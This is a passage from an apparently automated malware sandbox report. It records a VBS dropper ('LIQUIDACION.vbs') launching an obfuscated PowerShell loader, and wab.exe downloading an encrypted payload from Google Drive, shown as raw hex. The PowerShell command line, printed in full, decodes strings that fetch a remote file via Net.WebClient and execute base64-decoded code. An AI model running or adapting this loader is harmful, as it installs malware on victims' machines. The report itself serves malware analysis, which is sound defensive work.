                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.949713142.251.2.1324436908C:\Program Files (x86)\Windows Mail\wab.exe
                                        TimestampBytes transferredDirectionData
                                        2024-04-24 05:03:59 UTC258OUTGET /download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-04-24 05:04:00 UTC4762INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ABPtcPqedKmtX9MASgbaNRkumAgM_jhE9hb1JVTJ_ENQit_uDiJV4ilZV9iokaOy_6lmt-RSDLPdbqgV3g
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="mQacOddRSSTdtOOD119.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 268864
                                        Last-Modified: Mon, 22 Apr 2024 15:55:58 GMT
                                        Date: Wed, 24 Apr 2024 05:03:59 GMT
                                        Expires: Wed, 24 Apr 2024 05:03:59 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=Hz0cwQ==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2024-04-24 05:04:00 UTC4762INData Raw: 13 4e 52 17 f9 ca 7f 5e d9 68 c2 4b d5 8d bf 82 4d 41 f8 26 44 f7 ff 93 94 1b 97 3f d6 85 b9 d0 c8 e8 ec 5d f5 d1 e1 17 d4 1d 7c 03 d1 5f 88 ef 75 89 84 dd 4c 3b 21 4c 14 cf b6 a1 48 b8 e1 40 eb 91 e7 02 1b 29 4a 3d 4a 36 b6 a3 72 60 6a 87 f6 4c a6 5d f6 83 d6 c6 74 62 48 f4 e2 06 18 72 7e a2 b4 57 30 ff f2 9f 61 bf 64 3e c4 83 d3 4e 0f 79 61 fc 46 c0 14 1d 19 79 de 87 4a 05 01 f0 bf 8c ce 81 01 2a 33 6d 35 d4 df ee 49 1d e6 2e ea 66 cb ec 00 00 10 ea 04 17 b5 59 52 d0 fc 73 8c 31 cb 5b d6 e1 81 5d 2a d4 2f c0 ef ad e8 85 20 2d 36 d7 9e 23 4f 71 4c 42 09 e3 17 1a 06 63 d2 9c 38 3c 20 22 7a aa b4 dc 31 b3 a0 00 8f 54 97 23 e1 f3 f5 e5 91 24 41 59 52 12 25 e0 7b 56 8b 24 1b 75 38 2d 91 a2 b9 77 e8 c8 62 9e 56 3a 2c 6a ee 99 c9 d5 59 8f d8 a2 6b e5 cd b8 7a
                                        Data Ascii: NR^hKMA&D?]|_uL;!LH@)J=J6r`jL]tbHr~W0ad>NyaFyJ*3m5I.fYRs1[]*/ -6#OqLBc8< "z1T#$AYR%{V$u8-wbV:,jYkz
                                        2024-04-24 05:04:00 UTC4762INData Raw: ef 07 a4 5b ed e4 93 9a aa 14 73 ed e1 56 19 34 b1 16 bf bf b6 5a 63 0a 1b 91 22 b0 21 4d 79 82 7c 8b f8 c9 1a f7 77 7b 2d d9 7c c8 bd 91 77 b4 bf 4a 94 30 7e 75 45 a4 e9 49 9d 00 f6 23 83 a4 47 29 c9 9b 59 e1 d3 ad ad 7b c9 bb 53 d2 19 a3 d9 8e 59 4f 74 43 f4 55 1d 63 b6 65 cd ea 40 f3 14 b0 6b 78 4e 3d 12 e8 dc 37 f4 04 a6 8f aa 3d 62 80 bb 20 46 ee 40 78 29 28 7f e7 92 56 12 b4 cc fe e3 0f 48 1c d0 15 d5 4b 6d 5f c8 c3 24 26 50 9f e6 f9 7d 25 6b 47 25 81 08 8e 55 e4 41 3a 3d 68 8b 70 10 d7 e4 21 71 63 c9 ac a7 25 9b ca 02 db ad 36 9b f4 ea 22 74 e1 a1 4d 0f 34 84 43 e8 df 71 cd d5 a9 71 14 cc b0 64 7a 85 fe db 09 72 16 ec 6c 6c fd ab 28 48 ab 50 da 14 0e 4d 1f fd 44 46 fb d9 61 fb b9 2e 10 22 d1 8f cc 66 f7 8a 94 0f 06 2a 5c 5d f4 0f 9b f5 bc fd 5f d8
                                        Data Ascii: [sV4Zc"!My|w{-|wJ0~uEI#G)Y{SYOtCUce@kxN=7=b F@x)(VHKm_$&P}%kG%UA:=hp!qc%6"tM4Cqqdzrll(HPMDFa."f*\]_
                                        2024-04-24 05:04:00 UTC412INData Raw: 5c 78 e2 8b 1e ff b7 d7 79 7a 42 ab 69 04 32 56 eb 2a 79 ba cb c0 05 a8 fe 75 7e ac 34 75 94 66 c7 07 3b 74 2d 84 25 1e f5 ca c2 9a 7b db 0f 74 62 2d 43 88 e4 ee 36 d1 05 11 78 fb d5 a5 a3 08 00 d9 01 9e 96 b6 1b 7f 35 ba 05 7f 5f 50 8c 3f a6 1f fc 78 08 94 00 0b e6 32 c3 7c 91 ae 69 75 7d 45 f1 26 80 b2 0e 1d e6 dd b1 8c 4d 3c 46 68 aa 04 f5 0b ac 36 41 31 4f ae 78 e9 69 c0 ef c1 91 07 07 55 cd 74 3a 99 db 3e e0 e9 24 ab 38 7e a0 8b e3 63 df e5 03 f9 6c 7e aa 88 ec 61 79 9c 08 b7 14 de f1 e7 fe fe fd 87 15 3b 7f 56 a6 41 5a 9b 04 73 80 35 da aa 2f 70 27 87 c4 93 85 bd 04 61 de 87 d1 d2 9a 0c bf a8 df 8d bb de fb b7 55 6d 6a 1d 22 55 8e 17 8f 1c f1 7d c1 b2 2a 22 4a 15 cf 9f de d9 39 80 09 98 8c 98 6b cd e0 34 84 db c6 b8 9c 78 c0 22 18 75 97 7f 8c 78 40
                                        Data Ascii: \xyzBi2V*yu~4uf;t-%{tb-C6x5_P?x2|iu}E&M<Fh6A1OxiUt:>$8~cl~ay;VAZs5/p'aUmj"U}*"J9k4x"ux@
                                        2024-04-24 05:04:00 UTC1255INData Raw: 19 5b d4 d1 2b 66 ae ca c5 5c 87 f1 dd 75 9f a5 5a 12 e0 c8 f7 a8 d5 4b 0e fc fd 23 1c 6f 30 cb 3e 28 48 d2 a3 0c 2e 75 4b 9f ac 9c e1 59 f5 d6 fc 31 d6 e5 0e ad ae f0 07 61 58 24 62 a7 5a b0 33 4d e6 e4 c4 3f 0f b4 4a 79 7d e8 e1 63 88 c9 04 c2 eb 23 4f e5 1d 71 7f c5 93 aa b8 4a 00 3d ae 37 58 e9 3f de b7 4a f7 27 4a 62 4e 87 43 fd 9b 33 8c 2b c1 36 be 70 d4 07 c8 da 06 85 f5 8d 02 2a 49 20 fe e6 49 71 5a 78 0e b5 8b f7 be 68 71 70 25 7f 1a c0 e3 ba 52 2f 6b ff f8 dc 37 fd 34 68 34 20 c0 b3 10 36 77 1a 4e fa 5d f5 7c 6c ad 2b 09 9c bb be 14 fb b5 77 68 12 38 bf 07 df 67 43 0d d6 82 30 60 9a 92 8a b4 06 b7 06 64 9c d9 c2 e8 db 5c 19 6b 80 ed a6 f4 cf 49 8b 2e 2b af d3 96 f3 8c d9 87 da 80 03 5b 1b 7a 0a 38 3b e4 32 ba dc 7f 3d a7 7f 15 a3 05 64 98 29 cd
                                        Data Ascii: [+f\uZK#o0>(H.uKY1aX$bZ3M?Jy}c#OqJ=7X?J'JbNC3+6p*I IqZxhqp%R/k74h4 6wN]|l+wh8gC0`d\kI.+[z8;2=d)
                                        2024-04-24 05:04:00 UTC68INData Raw: 61 2b 6b 34 d1 05 4a 2f f2 55 69 02 d6 27 ee 42 0c a7 58 4e df a3 53 67 7d d4 14 75 cb 00 ff 24 a2 89 de cb 1a 04 9d 18 9a 59 75 e5 36 8d 56 0a 6b bf ce bd 8a 87 0e a0 77 1c 1b 11 0b d0 17 2a 77 e2 5b fa
                                        Data Ascii: a+k4J/Ui'BXNSg}u$Yu6Vkw*w[
                                        2024-04-24 05:04:00 UTC1255INData Raw: f1 0a 81 45 e7 9e fe a1 bf 6b f2 0c d0 66 0e 19 58 e4 c3 de b5 b5 77 5a a9 b9 e8 f0 b2 22 7e 02 23 8e 66 b4 c1 7a bd 59 25 a9 f4 31 4e 5b 4a 70 21 3c cd 26 25 58 28 58 57 4b f3 c7 72 96 59 8a 0e 31 85 c4 f5 cc 57 24 68 39 51 63 99 76 be 2d 39 39 04 68 28 7a e1 15 77 a5 fe dc 79 f9 fa 42 61 8e ce 6c be 26 43 9e a2 61 7a a6 75 90 5e 5c 67 1b c3 60 51 b6 6d e4 df 0c 4d ef 90 3b d5 b5 9e da 76 c3 48 9a 02 d0 ad 86 67 d7 2e fe bf 7f ab e6 c4 9d 7d 4f 47 46 aa bf 28 fe cb 16 19 7f 1c 94 f5 1e 33 be 5c 8b 06 84 ce 66 9c ce fe 0e c2 b0 59 7c ad 0d 3f ba 36 09 31 b6 e4 5c c7 fa 6c 3c 46 14 71 25 86 94 a3 35 0e 6b b7 aa fd 29 54 46 99 b8 66 09 5c de c3 2f 74 d2 a6 17 5c c3 03 2d 27 bf cc 29 86 4e a6 0f b4 5d fa 1b c8 83 d9 51 50 16 74 06 f6 19 0d c1 72 97 5b 2e 9b
                                        Data Ascii: EkfXwZ"~#fzY%1N[Jp!<&%X(XWKrY1W$h9Qcv-99h(zwyBal&Cazu^\g`QmM;vHg.}OGF(3\fY|?61\l<Fq%5k)TFf\/t\-')N]QPtr[.
                                        2024-04-24 05:04:00 UTC1255INData Raw: 0f 82 21 3d cc a9 7b b5 b3 76 0f 68 a4 b1 48 87 6d 4f 38 48 38 e4 f8 b6 53 b6 f1 20 7a 6f 00 83 ef 00 da 41 a9 56 ef 90 26 57 af 16 08 ea 80 77 d7 ed f0 3b 1f b9 e2 d7 85 27 04 73 c1 2b 1b 66 8b c5 cf bc 04 56 8a c1 53 8e 32 d1 35 a3 4e 9e 5c b6 f6 69 0a db c5 61 73 9e 58 a2 23 71 ea 89 67 ee e8 f0 24 72 46 5d 26 67 80 23 99 f2 62 e9 8c 63 1e 1f a4 80 04 69 71 c2 df de 45 12 6a 13 d9 59 f3 07 85 b6 43 ac 4a 3e 3c f5 59 9a 0b 38 b5 31 88 71 c7 54 6e bb 33 f4 cb a7 1a 2e 40 81 fe 48 83 6f 3f 16 26 fd fd 27 94 02 e5 94 87 5b a9 29 15 c6 2f 79 6b 32 7a fa 5a 45 f2 f5 20 10 a7 6d 69 16 bc 8e ce e5 cc c2 71 d1 f1 db 4b b2 b3 6a 7e ff d3 78 f6 a6 cd cc c5 8d 2a ac e2 5c 15 82 de 0f 88 db ac 64 aa e1 51 3e 3c 76 a5 6f 05 d1 fa dc 18 fb b9 20 ca 1d ff b4 38 f3 ec
                                        Data Ascii: !={vhHmO8H8S zoAV&Ww;'s+fVS25N\iasX#qg$rF]&g#bciqEjYCJ><Y81qTn3.@Ho?&'[)/yk2zZE miqKj~x*\dQ><vo 8
                                        2024-04-24 05:04:00 UTC1255INData Raw: aa e2 c6 9f 5d 63 0d 9f 61 48 25 ae 5d 80 4c 65 8a fa 9e 8d 72 e0 96 8c 0e fd 99 6e f9 b3 fd f0 be 97 5e d8 ca 19 cf 0e 1b de 65 6d 78 f7 03 fd 14 7c d3 a7 7f 15 22 3c 34 dd ee 4b 59 16 79 cb 0c c9 9e 9e f0 7e 6e 8f 56 63 20 9b bd a9 af 45 f3 07 fd 65 c7 d9 d5 7b a5 1a b4 5a ed e4 2c 2a 6b 77 dc dc 06 96 e3 36 6c 24 c7 aa 56 a6 3a bb f2 90 b7 c1 fd ee 75 8d ca f3 e9 8c 16 85 45 99 67 85 aa 06 26 69 28 ea 61 37 04 69 8e 70 fb c8 85 b4 65 2c d0 47 57 e9 9d 1a f0 66 76 e0 a7 a6 cc b4 c9 83 e9 21 ad a6 f5 65 d5 fa 27 2b 4c 12 3f 8f 28 88 7c 09 0a 65 d5 58 b3 3d bc d9 5b a8 df 39 39 cb 16 58 df 3c ae 4f 70 32 b8 65 81 21 74 bd 9c 1b 26 b1 fc a4 e9 8a 5a 9c b9 93 b7 97 22 02 db d4 86 44 1b c9 c7 9c 1f 38 96 b2 1e 14 68 65 c8 66 57 e5 df 3f 75 eb 7d bd a8 29 a6
                                        Data Ascii: ]caH%]Lern^emx|"<4KYy~nVc Ee{Z,*kw6l$V:uEg&i(a7ipe,GWfv!e'+L?(|eX=[99X<Op2e!t&Z"D8hefW?u})
                                        2024-04-24 05:04:00 UTC1255INData Raw: 49 03 b8 1b 7d 92 d2 e2 01 9e 4c 99 e5 75 c6 c0 a5 03 55 fd 7d 71 ae 64 3c 5c dc 2f 38 fb b1 fb 4c db 2e 86 b7 51 8d cf b4 52 d9 95 df 20 4f b4 e9 6d 05 22 f2 ce 52 67 b9 97 33 bd ec eb 0b e7 6e f6 cc cb df 55 8f e2 7d 58 b9 7f 1b ba b7 21 d6 48 a6 e0 77 c7 2d 6e 2a 4b 16 9f 6a e6 da 0f c6 b2 27 2a d5 c6 03 0d 00 e2 70 7f 33 8b 9b 38 32 c6 8e 64 f5 d8 c3 46 61 56 5c d1 ed 48 62 5d d6 20 25 15 0e 01 15 b5 e1 c5 a6 eb e5 9a 2a 63 b6 ee 4c d8 d1 0a 91 6e 4c 2d ff 83 0b 2d 26 17 a6 8a 7c 32 f4 26 ae 5b e6 da 30 d8 62 21 ce 8c 7b cc 12 f6 74 07 d1 9e cd 38 dc f5 dc 38 11 d5 da 7f 7b 8b f1 90 8d 5a 0a 49 07 a5 cb bf 79 a1 c3 b1 f7 68 27 b7 a3 81 33 37 b2 d9 d0 c4 da 8c d1 3a cc 2f 19 1e 9c 15 26 02 a4 0d aa e9 d4 7d 0e 95 7e 8f a8 ef 4b 25 61 44 55 b3 b5 ff 8f
                                        Data Ascii: I}LuU}qd<\/8L.QR Om"Rg3nU}X!Hw-n*Kj'*p382dFaV\Hb] %*cLnL--&|2&[0b!{t88{ZIyh'37:/&}~K%aDU
                                        2024-04-24 05:04:00 UTC1255INData Raw: 3a 77 e5 13 18 b9 99 4a 27 a1 e0 d4 f8 6d 3f d6 fa 33 a7 a6 b3 f3 37 32 f2 e7 06 49 8f 92 a1 7f c2 02 46 cd f3 52 92 8a 3e c3 31 27 91 94 b7 f3 fd 94 ba c5 2e 2d 4f ba 8a e0 2e 65 20 e3 65 e7 2f 4d e8 98 03 35 e1 45 e0 bd fa 12 3a 2b e7 65 25 6c 46 f5 ff b2 85 2f 16 03 bd cf b9 c0 4e fa 39 1e bf ba fe 84 fd 7e bb 09 22 23 d9 9e 89 79 d4 16 56 fd ab 15 e4 e1 23 aa 19 94 17 e3 64 29 e1 3f b8 a8 ac b6 0d b5 60 dc 89 ea 25 23 80 76 d6 69 69 f8 a2 3c 0a bc 99 cf e6 74 c7 71 4c 23 69 da 96 53 e5 58 6b cd 2c a0 51 da 41 31 72 91 8a 00 85 77 9d 16 b4 2f 30 41 d7 d6 3c bf d8 62 fe 7d 56 c6 5c 64 ae 3e 00 51 f2 4d 7c 6e 8a 8f ef a3 3c 36 bf 13 c6 61 31 b5 ba 07 41 9f bd 76 46 a1 fa 2a fc e4 f8 58 47 b2 ae d4 66 3b 68 eb 3e 8f a9 70 18 8c 57 e1 e8 6c 9c dd 9e 52 7b
                                        Data Ascii: :wJ'm?372IFR>1'.-O.e e/M5E:+e%lF/N9~"#yV#d)?`%#vii<tqL#iSXk,QA1rw/0A<b}V\d>QM|n<6a1AvF*XGf;h>pWlR{


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:07:02:58
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
                                        Imagebase:0x7ff61f100000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:07:02:59
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere (Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig= OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8 Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP rlacSorg. ');$Plantaginales173=Herremaend 'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere (Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e( PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ ');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4 VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent, ');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall, Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi 